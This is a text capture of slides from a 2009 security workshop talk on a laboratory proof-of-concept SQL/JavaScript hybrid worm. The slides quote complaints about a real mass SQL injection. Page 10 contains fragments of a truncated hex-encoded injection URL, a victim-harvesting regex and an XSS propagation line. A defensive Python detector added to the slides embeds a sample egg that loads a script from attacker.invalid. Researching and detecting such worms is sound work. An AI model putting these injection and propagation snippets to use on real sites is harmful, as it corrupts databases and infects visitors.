
SQL/JavaScript Hybrid Worms As Two-stage Quines


DESCRIPTION

Delving into present trends and anticipating future malware trends, a hybrid, SQL on the server-side, JavaScript on the client-side, self-replicating worm based on two-stage quines was designed and implemented on an ad-hoc scenario instantiating a very common software pattern. The proof of concept code combines techniques seen in the wild, in the form of SQL injections leading to cross-site scripting JavaScript inclusion, and seen in the laboratory, in the form of SQL quines propagated via RFIDs, resulting in a hybrid code injection. General features of hybrid worms are also discussed.


Page 1: SQL/JavaScript Hybrid Worms As Two-stage Quines

Page 1 - CONFIDENTIAL -

SQL/JavaScript Hybrid Worms

As Two-stage Quines

Workshop Seguridad Informática 2009 – 38 JAIIO (MDQ)

Lic. José Orlicki (jorlicki@)

August 26th, 2009


Page 2

Not-So-Secret Agenda

Motivation

Hybrid Scenario

Features Discussion

Proof of Concept Highlights

Demo&Discussion!?

Abstract: a what-if worm scenario based on

SQL/JS real incidents and prototype code,

leads to proof-of-concept on laboratory with

widely-deployed technologies (unhardened).

Helps anticipate future trends and protections.

- DECLASSIFIED -


Page 3 - CONFIDENTIAL -

Attacks in the Wild! (2008)

[..] Anyone know about www.nihaorr1.com/1.js? The db that supports our company's ecommerce is filling up with this url [..]

[..] The script www.nihaorr1.com/1.js is getting inserted into every record of my organization's SQL db. I'm the accidental techie in my office, and I'm clueless [..]

"Huge Web Hack Attack Infects Many Pages", Gregg Keizer, Computerworld (nihaorr1 -> favorite search engine)


Page 4

Prototype of infected RFIDs! (2006)

Is Your Cat Infected with a Computer Virus? Melanie R. Rieback,

Bruno Crispo, Andrew S. Tanenbaum

SQL virus prototype propagating via RFID tags. (Virus != Worm?)

Uses SQL Quines, self-replicating statements.


Page 5 - CONFIDENTIAL -

Can SQL and JavaScript be combined in a worm?


Page 6

Basic Quines in T-SQL and Javascript

Version 1: quine classic techniques in T-SQL

- NOT CONFIDENTIAL -


Page 7

Basic Quines in T-SQL and Javascript

Version 2: quine using native reflection hack in T-SQL

- NOT CONFIDENTIAL -


Page 8

Basic Quines in T-SQL and Javascript

Version 3 (fail!): quine classic and native getElementById() techniques in SQL

Similar to Version 1 but on the JS/client-side

Similar to Version 2 but idem…

- NOT CONFIDENTIAL -


Page 9 - CONFIDENTIAL -

Proof of Concept

Lab:

1. CherryPy,

2. Two ad-hoc-vulnerable webapps in different domains,

3. MS-SQL,

4. Python SQL interface, no modifications.

Two-stage self-replication.

Targets VARCHAR and TEXT db fields, ALL TABLEs…

Version 1: MS-SQL quines, JavaScript regexes to extract possible new victim URLs, blind injection. (7359 bytes of SQLi egg)

Version 2: MS-SQL reflective features. (approx. 3000 bytes, idem)

Version 3 (fail!): JavaScript quines and reflection worked, the complete worm didn't. (estimated 1500 bytes)


Page 10

Proof of Concept (cont.)

SQL hex and URL encoding: stealthiness and SQLi correctness. 4-variable scattered egg (the original 2008 attack used 1 variable).

http://192.168.1.105:8081/greetUser?numid=1%3BDECLARE+@S+VARCHAR(MAX),@S2+VARCHAR(MAX),@S3+VARCHAR(MAX),@S4+VARCHAR(MAX)%3BSET+@S=CAST(0x0d0a444398498468...

Regex matching for detecting possible new victim sites:

var regexp = new RegExp("[a-zA-Z0-9-.?_&=:\/]+\/[a-zA-Z0-9-\.?_&=]+=[0-9]+", "g");
var m = infected_html.match(regexp);

JavaScript blind XSS for propagation (very naive!):

document.write("<img src=" + NEW_VICTIM_URL + sql_egg + ">");

- NOT CONFIDENTIAL -
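A defender's counterpart to the encoded egg on this slide, added here and not part of the original talk: it URL-decodes a request, decodes any long 0x... hex literal the way CAST(0x... AS VARCHAR(MAX)) would, and flags the DECLARE/CAST/EXEC chain together with a decoded <script src=> tag. The endpoint, parameter name and payload are constructed samples modelled on the lab URL above.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Long hex literal (even nibble count, at least 8 bytes) as used by
# CAST(0x... AS VARCHAR(MAX)) eggs; short literals such as 0x1 are ignored.
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2}){8,})")
# Markers of the hex-encoded egg: declare a VARCHAR(MAX), fill it from a
# hex CAST, then run it with EXEC(@S).  Compared after uppercasing.
EGG_MARKERS = ("DECLARE", "VARCHAR(MAX)", "CAST(0X", "EXEC(")
SCRIPT_TAG = re.compile(r"<script[^>]*\bsrc\s*=", re.I)


def decode_hex_literals(sql: str) -> list[str]:
    """Decode every long 0x literal in an SQL fragment to text."""
    decoded = []
    for hexdigits in HEX_LITERAL.findall(sql):
        raw = bytes.fromhex(hexdigits)
        # VARCHAR casts are single-byte text; an NVARCHAR egg would be
        # UTF-16-LE, which shows up as NUL bytes between ASCII characters.
        text = raw.decode("latin-1")
        if "\x00" in text:
            text = raw.decode("utf-16-le", errors="replace")
        decoded.append(text)
    return decoded


def inspect_request(url: str) -> dict:
    """Classify one request URL and return the evidence found in it."""
    query = unquote_plus(urlsplit(url).query)  # %3B -> ';', '+' -> ' '
    reasons = [m for m in EGG_MARKERS if m in query.upper()]
    decoded = decode_hex_literals(query)
    script_in_egg = any(SCRIPT_TAG.search(text) for text in decoded)
    if script_in_egg:
        reasons.append("decoded hex carries a <script src=> tag")
    # A lone DECLARE in a query string is noise; the full chain, or any
    # hex payload that decodes to a script tag, is not.
    suspicious = len(reasons) >= 3 or script_in_egg
    return {"suspicious": suspicious, "reasons": reasons, "decoded": decoded}


# Constructed sample requests (not from the talk): the lab-style greetUser
# endpoint once with a plain id and once with a one-variable hex egg whose
# decoded body appends a remote script tag to a text column.
BENIGN_URL = "http://192.168.1.105:8081/greetUser?numid=1"
_EGG = b"UPDATE msgs SET body=body+'<script src=http://attacker.invalid/1.js></script>'"
INJECTED_URL = (
    "http://192.168.1.105:8081/greetUser?numid=1%3BDECLARE+@S+VARCHAR(MAX)%3B"
    "SET+@S=CAST(0x" + _EGG.hex() + "+AS+VARCHAR(MAX))%3BEXEC(@S)%3B--"
)
```

Run `inspect_request` over each request line of a web server log; the decoded text also tells an incident responder which columns and script URL to look for in the database.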


Page 11 - CONFIDENTIAL -

¡Hybrid Worms Discussion!

Billy Hoffman and John Terrill, "The Little Hybrid Web Worm that Could", Black Hat USA 2007. (they focus on JS obfuscation and Perl)

No choke point.

Stealthier infections.

More portability (interpreted lang?)

Target generic vulnerabilities (idem)

Easily obfuscated (idem)

Fewer crashes (idem)

Data/Web 2.0/Cloud centric?


Page 12

Demonstration!?

...but I can only show you the door. You're the one that has to walk through it...

Acknowledgements:

- Core Security Team: support and creative environment.

- Sebastián Cufre: T-SQL tricks.

- Aureliano Calvo: Javascript concepts.

- Pedro Varangot: suitable testing computer.

- DECLASSIFIED -


Page 13 - CONFIDENTIAL -

Questions?

Thanks!

Contact: